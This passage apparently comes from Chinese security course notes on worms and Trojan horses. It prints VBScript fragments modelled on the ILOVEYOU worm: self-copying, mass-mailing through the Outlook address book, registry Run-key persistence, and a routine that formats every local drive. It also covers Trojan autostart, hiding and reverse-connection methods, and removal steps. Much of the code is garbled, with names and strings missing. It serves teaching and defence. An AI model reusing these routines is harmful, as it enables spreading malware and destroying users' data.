45、，進行病毒掃描；清除病毒后能將無毒的郵件數(shù)據(jù)重新編碼，傳送給郵件客戶端，并且能夠更改主題、添加查毒報告附件，具備垃圾郵件處理功能等。 還有比較法、感染實驗法等。 4.4 蠕蟲病毒分析 蠕蟲病毒是目前對計算機威脅最大的網(wǎng)絡(luò)病毒，蠕蟲病毒的特征： 1蠕蟲病毒的自我復(fù)制能力 可以用VB腳本語言編寫實現(xiàn)自我復(fù)制程序。 Set objFs=CreateObject（“”） 創(chuàng)建一個文件系統(tǒng)對象 Set ff= （“”，1） 通過文件系統(tǒng)對象的方法創(chuàng)建了一個TXT文件。 或 （“C:” ）（沒有，1） 如果把這兩句話保存成為.vbs的VB腳本文件，點擊鼠標(biāo)就會在C盤中創(chuàng)建一個TXT文件了。如果把第二句改為

46、： （）.Copy （“C：”） 就可實現(xiàn)將自身復(fù)制到C盤這個文件上。 2蠕蟲病毒的傳播性 其VB腳本代碼如下： SetobjOA=（“”）創(chuàng)建一個OUTLOOK應(yīng)用的對象 SetobjMapi= （“MAPI”） 取得MAPI名字空間 For i=1 to 遍歷地址簿 Set objAddList= （i） For j=1 To objAddList. Set objMail= （0） （objAddList. AddressEntries （j） 取得收件人郵件地址 =“你好!” 設(shè)置郵件主題 =“這次給你的附件，是我的新文檔！” 設(shè)置信件內(nèi)容 （“”） 把自己作為附件擴散出去 發(fā)送郵件

47、Next Next Set objMapi=Nothing 清空objMapi變量，釋放資源 Set objOA=Nothing 清空objOA變量 3蠕蟲病毒的潛伏性 以下是愛蟲病毒中的部分代碼： On Error Resume Next 容錯語句，避免程序崩潰 dim wscr,rr set wscr=CreateObject （） 擊活 對象 rr=HKEY_CURRENT_USERSoftwareMicrosoftWindowscripting HostSettingsTimeout） 讀入注冊表中的超時鍵值if （rr=1） then 超時設(shè)置“HKEY_CURRENT_USERSo

48、ftwareMicrosoftWindowsScripting HostSettingsTimeout”,0,“REG_DWORD”end if 下面的一段代碼則是修改注冊表，使得每次系統(tǒng)啟動時自動執(zhí)行腳本文件。其中和是病毒腳本的一個副本。 regcreate“HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunMSKernel32“,dirsystem&”regcreate “HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServicesWin32DLL,

49、“dirwin&”Win32DLL.vbs”4蠕蟲病毒的觸發(fā)性 x=time（） if x= then end if5蠕蟲病毒的破壞性 sub killc （） 破壞硬盤的過程On Error Resume Next 容錯語句，避免程序崩潰dim fs,auto,disc,ds,ss,i,x,dirSetfs=CreateObject(“”)Set auto = （“”, True） 建立或修改自動批處理 （“echo off”） 屏蔽掉刪除的進程 （“Smartdrv”）加載磁盤緩沖 Set disc = 得到磁盤驅(qū)動器的集合For Each ds in discIf = 2 Then 如果

50、磁盤驅(qū)動器是本地盤ss = ss & 就將符號連在一起End IfNextss=LCase （StrReverse （Trim （ss） 得到符號串的反向小寫形式For i=1 to Len （ss） 遍歷每個磁盤驅(qū)動器x=Mid （ss,i,1） 讀每個磁盤驅(qū)動器的符號 （“format/autotest/q/u “&x&”:”） 反向 （從Z：到A：）自動格式化磁盤驅(qū)動器next 關(guān)閉批處理文件set dir= （“”）dir.attributes=dir.attributes+2 將自動批處理文件改為隱藏 4.5 特洛伊木馬4.5.1 黑客程序與特洛伊木馬 特洛伊木馬實際上是一種典型的黑

51、客程序，它是一種基于遠(yuǎn)程控制的黑客工具，現(xiàn)在已成為黑客程序的代名詞。將黑客程序形容為特洛伊木馬就是要體現(xiàn)黑客程序的隱蔽性和欺騙性。 比較著名的木馬程序有BackOrifice（BO）、Netspy（網(wǎng)絡(luò)精靈）、Glacier（冰河）等，這些木馬程序大多可以在網(wǎng)上下載下來直接使用。4.5.2 木馬的基本原理 木馬本質(zhì)上只是一個網(wǎng)絡(luò)客戶/服務(wù)程序（Client/Server），一般有兩個部分組成：一個是服務(wù)端程序，另一個是客戶端程序。以冰河程序為例，在VB中，可以使用WinSock控件來編寫網(wǎng)絡(luò)客戶服務(wù)程序，實現(xiàn)方法如下：服務(wù)端： G_ =7626（冰河的默認(rèn)端口，可以改為別的值） （等待連接）客

52、戶端： G_ =ServerIP（設(shè)遠(yuǎn)端地址為服務(wù)器地址） G _=7626（設(shè)遠(yuǎn)程端口為冰河的默認(rèn)端口） （調(diào)用Winsock控件的連接方法） 其中，G_Server和G_Client均為Winsock控件。一旦服務(wù)端接到客戶端的連接請求Connection Request，就接受連接。 Private Sub G_ server connection Request G_ Server.Accept reauestID End Sub 客戶機端用發(fā)送命令，而服務(wù)器在G_Server DateArrive事件中接受并執(zhí)行命令（幾乎所有的木馬功能都在這個事件處理程序中實現(xiàn)）。如果客戶斷開連接，

53、則關(guān)閉連接并重新監(jiān)聽端口。 Private Sub G _Server Close（） （關(guān)閉連接） （再次監(jiān)聽） End Sub 4.5.3 特洛伊木馬的啟動方式 首先黑客將木馬程序捆綁在一些常用的軟件上，甚至在你瀏覽網(wǎng)頁的時候，將木馬悄悄安裝到你的計算機中。 將一個程序捆綁到另一個程序可以通過自己編寫程序來實現(xiàn)，也可以從網(wǎng)上下載類似DAMS文件捆綁器來實現(xiàn)。 在Windows系統(tǒng)中，黑客實現(xiàn)程序自啟動的方法很多，常見的方法有： 1修改系統(tǒng)配置文件 通過修改系統(tǒng)配置文件、來實現(xiàn)木馬的自啟動。 有兩個數(shù)據(jù)項“l(fā)oad = ”和“run = ”，如果木馬需要在系統(tǒng)啟動后運行一個程序，只要在“l(fā)o

54、ad = ”和“run = ”后添加該程序的程序名就可以了。 2修改注冊表 修改注冊表是木馬最常用的攻擊和入侵手段，在注冊表中有一名稱為： HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrent VersionRun*的鍵。 如果想讓程序在系統(tǒng)啟動的過程中啟動該程序，就可以向該目錄添加一個子項。 黑客比較喜歡在帶“Once”的主鍵中作手腳，因為帶“Once”的主鍵中的鍵值在程序運行后將被刪除。這樣，當(dāng)用戶使用注冊表修改程序查看時不會發(fā)現(xiàn)。 3通過文件關(guān)聯(lián)啟動 例如，通過.exe文件關(guān)聯(lián)exefile，將注冊表中HKEY CLASSES ROOTexe

55、file下的shellopencommand的默認(rèn)“%1”%*”改成“x: xxxbsy.exe”（木馬程序的路徑），讓系統(tǒng)在執(zhí)行.exe程序時就自動運行木馬程序。通常修改的還有.txt文件關(guān)聯(lián)txtfile，只要讀取.txt文本文件就執(zhí)行木馬程序等。 4利用文件自動運行功能 例如在E盤根目錄下新建一個文件，用記事本打開它，輸入如下內(nèi)容： autorun 保存后重新啟動，進入“我的電腦”，然后雙擊E盤盤符，記事本被打開了，而E盤卻沒有打開。 5利用對動態(tài)連接庫（DLL）的調(diào)用 黑客可以將木馬程序捆綁到DLL上（如），當(dāng)用戶使用API函數(shù)時，黑客就會先啟動木馬程序，然后再調(diào)用真正的函數(shù)完成API

56、函數(shù)功能。 4.5.4 特洛伊木馬端口 黑客所使用的客戶端程序就可以進入木馬打開的端口和木馬進行通信。 每種木馬所打開的端口不同，根據(jù)端口號可以識別不同的木馬。 大多數(shù)木馬使用的端口號在1024以上。4.5.5 特洛伊木馬的隱藏 木馬為了更好地隱藏自己，通常會將自己的位置放在c:windows和c:windowssystem32等系統(tǒng)目錄中。 木馬的服務(wù)程序命名也很狡猾，通常使用和系統(tǒng)文件相似的文件名。 如果黑客把木馬程序取名為“ .exe”，其中是中文的全角空格，我們看到木馬程序?qū)⑹且粋€無文件名的文件。 有的木馬具有很強的潛伏能力，表面上的木馬程序被發(fā)現(xiàn)并被刪除后，后備的木馬在一定的條件下會

57、恢復(fù)被刪除的木馬。 4.5.6 特洛伊木馬分類 1主動型木馬 主動型木馬原理圖 2反彈型木馬 反彈型木馬原理圖 黑客將安放在內(nèi)部網(wǎng)絡(luò)的反彈木馬定時地連接外部攻擊的主機，由于連接是從內(nèi)部發(fā)起的，防火墻無法區(qū)分是木馬的連接還是合法的連接。 3嵌入式木馬 嵌入式木馬是黑客將木馬程序嵌入到己知的網(wǎng)絡(luò)通信程序中（如IE瀏覽器、操作系統(tǒng)等），利用己知的網(wǎng)絡(luò)通信程序來轉(zhuǎn)發(fā)木馬控制指令，躲過防火墻檢測。4.5.7 特洛伊木馬查殺 木馬的查殺可以采用自動和手動兩種方式。最簡單的刪除木馬方法是安裝殺毒軟件或一些專殺木馬的軟件。 由于殺毒軟件的升級要慢于木馬的出現(xiàn)，因此學(xué)會手工查殺也是非常必要。 在手工刪除木馬之前

58、，最重要的一項工作是備份注冊表，防止系統(tǒng)崩潰，備份你認(rèn)為是木馬的文件。如果不是木馬就可以恢復(fù)，如果是木馬就可以對木馬進行分析。 1查看注冊表 在HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion和HKEY_CURRENT_USERSoftware MicrosoftWindowsCurrentVersion下所有以“Run”開頭的鍵值名有沒有可疑的文件名。 2檢查啟動組 啟動組對應(yīng)的文件夾為：C:windowsstart menuprogramsstartup，要經(jīng)常檢查啟動組中是否有異常的文件。 3檢查系統(tǒng)配置文件 檢查、等系統(tǒng)配置文件?，F(xiàn)在修改中Shell值的情況要多一些，如果在中看到：時，這個有可能就是木馬程序。 4查看端口與進程 使用Windows本身自帶的netstat -an命令就能查看到與本機建立連接的IP以及本機偵聽的端口。也可以使用Active Ports工具監(jiān)視計算機所有打開的TCP/IP